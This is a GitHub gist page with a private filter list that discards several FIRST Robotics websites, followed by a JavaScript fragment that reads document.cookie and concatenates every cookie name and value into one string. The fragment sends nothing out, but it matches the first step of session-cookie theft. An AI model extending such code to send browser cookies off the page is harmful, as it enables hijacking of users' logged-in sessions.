Skip to content

Instantly share code, notes, and snippets.

View TotalTaxAmount's full-sized avatar

TotalTaxAmount TotalTaxAmount

View GitHub Profile
! name: FRC Team Websites
! description: FRC
! public: false
! author: TotalTax
! FIRST
$discard,site=thebluealliance.com
$discard,site=firstinspires.org
$discard,site=frcteamgraph.com
$discard,site=chiefdelphi.com
let lol = '';
const cookies = document.cookie;
const cookieArray = cookies.split(';');
for (let i = 0; i < cookieArray.length; i++) {
const cookie = cookieArray[i].trim();
const [name, value] = cookie.split('=');
lol += `${name}:${value}`;
}